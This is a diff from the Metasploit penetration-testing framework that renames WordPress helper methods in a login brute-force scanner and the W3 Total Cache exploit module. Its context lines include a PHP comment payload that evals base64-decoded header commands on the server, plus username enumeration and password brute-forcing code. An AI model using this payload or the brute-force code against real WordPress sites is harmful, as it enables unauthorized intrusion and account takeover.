implement @limhoff-r7 feedback

lib/msf/core/exploit/wordpress.rb

@@ -8,7 +8,6 @@ module Msf
 ###
 	module Exploit::Remote::Wordpress
 		include Exploit::Remote::HttpClient
-		include Msf::Auxiliary::Report
 
 		def initialize(info = {})
 			super
@@ -24,7 +23,7 @@ module Msf
 		# Checks if the site is online and running wordpress
 		# @return [Boolean] Returns true if the site is online and running wordpress
 		#
-		def wp_wordpress_and_online?
+		def wordpress_and_online?
 			begin
 				res = send_request_cgi({
 						'method' => 'GET',
@@ -52,7 +51,7 @@ module Msf
 		# Returns the Wordpress Login URL
 		# @return [String] Wordpress Login URL
 		#
-		def wp_uri_login
+		def wordpress_uri_login
 			normalize_uri(target_uri.path, 'wp-login.php')
 		end
 
@@ -61,7 +60,7 @@ module Msf
 		# @param post_id Post ID
 		# @return [String] Wordpress Post URL
 		#
-		def wp_url_post(post_id)
+		def wordpress_url_post(post_id)
 			normalize_uri(target_uri.path) + "/?p=#{post_id}"
 		end
 
@@ -70,7 +69,7 @@ module Msf
 		# @param author_id Author ID
 		# @return [String] Wordpress Author URL
 		#
-		def wp_url_author(author_id)
+		def wordpress_url_author(author_id)
 			normalize_uri(target_uri.path) + "/?author=#{author_id}"
 		end
 
@@ -80,12 +79,12 @@ module Msf
 		# @param pass Password
 		# @return [String] the session cookie on successful login, nil otherwise
 		#
-		def wp_login(user, pass)
+		def wordpress_login(user, pass)
 			redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"
 			res = send_request_cgi({
 					'method' => 'POST',
-					'uri' => wp_uri_login,
+					'uri' => wordpress_uri_login,
-					'data' => _wp_login_post_data(user, pass, redirect),
+					'data' => wordpress_helper_login_post_data(user, pass, redirect),
 			}, 20)
 
 			if res and res.code == 302 and res.headers['Location'] == redirect
@@ -103,11 +102,11 @@ module Msf
 		# @param user Username
 		# @return [Boolean] true if the user exists
 		#
-		def wp_user_exists?(user)
+		def wordpress_user_exists?(user)
 			res = send_request_cgi({
 					'method' => 'POST',
-					'uri' => wp_uri_login,
+					'uri' => wordpress_uri_login,
-					'data' => _wp_login_post_data(user, 'x'),
+					'data' => wordpress_helper_login_post_data(user, 'x'),
 			}, 20)
 
 			exists = false
@@ -127,8 +126,8 @@ module Msf
 		# @param user_id user_id
 		# @return [String] the Username if it exists, nil otherwise
 		#
-		def wp_userid_exists?(user_id)
+		def wordpress_userid_exists?(user_id)
-			url = wp_url_author(user_id)
+			url = wordpress_url_author(user_id)
 			res = send_request_cgi({
 					'method' => 'GET',
 					'uri' => url
@@ -164,8 +163,8 @@ module Msf
 		# @param login_cookie The valid login_cookie
 		# @return [String] The location of the new comment/post
 		#
-		def wp_post_comment_auth(comment, comment_post_id, login_cookie)
+		def wordpress_post_comment_auth(comment, comment_post_id, login_cookie)
-			_wp_post_comment(comment, comment_post_id, login_cookie, nil, nil, nil)
+			wordpress_helper_post_comment(comment, comment_post_id, login_cookie, nil, nil, nil)
 		end
 
 		#
@@ -177,8 +176,8 @@ module Msf
 		# @param url The author url
 		# @return [String] The location of the new comment/post
 		#
-		def wp_post_comment_no_auth(comment, comment_post_id, author, email, url)
+		def wordpress_post_comment_no_auth(comment, comment_post_id, author, email, url)
-			_wp_post_comment(comment, comment_post_id, nil, author, email, url)
+			wordpress_helper_post_comment(comment, comment_post_id, nil, author, email, url)
 		end
 
 		#
@@ -186,8 +185,8 @@ module Msf
 		# @param login_cookie If set perform the bruteforce as an authenticated user
 		# @return [Integer] The post id, nil when nothing found
 		#
-		def wp_get_valid_post_id(login_cookie=nil)
+		def wordpress_get_valid_post_id(login_cookie=nil)
-			_wp_get_valid_post_id(false, login_cookie)
+			wordpress_helper_get_valid_post_id(false, login_cookie)
 		end
 
 		#
@@ -195,8 +194,8 @@ module Msf
 		# @param login_cookie If set perform the bruteforce as an authenticated user
 		# @return [Integer] The post id, nil when nothing found
 		#
-		def wp_get_valid_post_id_with_comments_enabled(login_cookie=nil)
+		def wordpress_get_valid_post_id_with_comments_enabled(login_cookie=nil)
-			_wp_get_valid_post_id(true, login_cookie)
+			wordpress_helper_get_valid_post_id(true, login_cookie)
 		end
 
 		#
@@ -205,8 +204,8 @@ module Msf
 		# @param login_cookie If set perform the check as an authenticated user
 		# @return [String] the HTTP response body of the post, nil otherwise
 		#
-		def wp_post_comments_enabled?(post_id, login_cookie=nil)
+		def wordpress_post_comments_enabled?(post_id, login_cookie=nil)
-			_wp_check_post_id(wp_url_post(post_id), true, login_cookie)
+			wordpress_helper_check_post_id(wordpress_url_post(post_id), true, login_cookie)
 		end
 
 		private
@@ -218,7 +217,7 @@ module Msf
 		# @param redirect URL to redirect after successful login
 		# @return [String] The post data
 		#
-		def _wp_login_post_data(user, pass, redirect=nil)
+		def wordpress_helper_login_post_data(user, pass, redirect=nil)
 			post_data = "log=#{Rex::Text.uri_encode(user.to_s)}"
 			post_data << "&pwd=#{Rex::Text.uri_encode(pass.to_s)}"
 			post_data << "&redirect_to=#{Rex::Text.uri_encode(redirect.to_s)}"
@@ -236,7 +235,7 @@ module Msf
 		# @param url The author url
 		# @return [String] The location of the new comment/post
 		#
-		def _wp_post_comment(comment, comment_post_id, login_cookie, author, email, url)
+		def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url)
 			vars_post = {
 					'comment' => comment,
 					'submit' => 'Post+Comment',
@@ -270,10 +269,10 @@ module Msf
 		# @param login_cookie A valid login cookie to perform the bruteforce as an authenticated user
 		# @return [Integer] The post id, nil when nothing found
 		#
-		def _wp_get_valid_post_id(comments_enabled=false, login_cookie=nil)
+		def wordpress_helper_get_valid_post_id(comments_enabled=false, login_cookie=nil)
 			(1..1000).each { |id|
 				vprint_status("#{rhost}:#{rport} - Checking POST ID #{id}...") if (id % 100) == 0
-				body = _wp_check_post_id(wp_url_post(id), comments_enabled, login_cookie)
+				body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
 				return id if body
 			}
 			# no post found
@@ -287,7 +286,7 @@ module Msf
 		# @param login_cookie A valid login cookie to perform the check as an authenticated user
 		# @return [String] the HTTP response body of the post, nil otherwise
 		#
-		def _wp_check_post_id(uri, comments_enabled=false, login_cookie=nil)
+		def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
 			options = {
 					'method' => 'GET',
 					'uri' => uri
@@ -311,7 +310,7 @@ module Msf
 				location = URI(res.headers['Location'])
 				uri = location.path
 				uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
-				return _wp_check_post_id(uri, comments_enabled)
+				return wordpress_helper_check_post_id(uri, comments_enabled, login_cookie)
 			end
 			return nil
 		end

modules/auxiliary/scanner/http/wordpress_login_enum.rb

@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 
-		unless wp_wordpress_and_online?
+		unless wordpress_and_online?
 			fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
 		end
 
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
 	def do_enum(user=nil)
 		print_status("#{target_uri} - WordPress Enumeration - Checking Username:'#{user}'")
 
-		exists = wp_user_exists?(user)
+		exists = wordpress_user_exists?(user)
 		if exists
 			print_good("#{target_uri} - WordPress Enumeration- Username: '#{user}' - is VALID")
 			report_auth_info(
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary
 	def do_login(user=nil, pass=nil)
 		vprint_status("#{target_uri} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
 
-		cookie = wp_login(user, pass)
+		cookie = wordpress_login(user, pass)
 
 		if cookie
 			print_good("#{target_uri} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
 	def enum_usernames
 		usernames = []
 		for i in datastore['RANGE_START']..datastore['RANGE_END']
-			username = wp_userid_exists?(i)
+			username = wordpress_userid_exists?(i)
 			if username
 				print_good "#{target_uri} - Found user '#{username}' with id #{i.to_s}"
 				usernames << username

modules/exploits/unix/webapp/php_wordpress_total_cache.rb

@@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
 
 		if @auth
-			uri = wp_post_comment_auth(php_payload, @post_id, @cookie)
+			uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie)
 		else
-			uri = wp_post_comment_no_auth(php_payload,
+			uri = wordpress_post_comment_no_auth(php_payload,
 					@post_id,
 					rand_text_alpha(8),
 					"#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com",
@@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		unless wp_wordpress_and_online?
+		unless wordpress_and_online?
 			fail_with(Failure::NoTarget, "#{peer} does not seeem to be Wordpress site")
 		end
 
@@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		if @auth
 			print_status("#{peer} - Trying to login...")
-			@cookie = wp_login(@user, @password)
+			@cookie = wordpress_login(@user, @password)
 			if @cookie.nil?
 				fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
 			end
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
 		else
 			print_status("#{peer} - Trying to brute force a valid POST ID...")
-			@post_id = wp_get_valid_post_id_with_comments_enabled
+			@post_id = wordpress_get_valid_post_id_with_comments_enabled
 			if @post_id.nil?
 				fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
 			else
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		unless wp_wordpress_and_online?
+		unless wordpress_and_online?
 			print_error("#{peer} does not seeem to be Wordpress site")
 			return Exploit::CheckCode::Unknown
 		end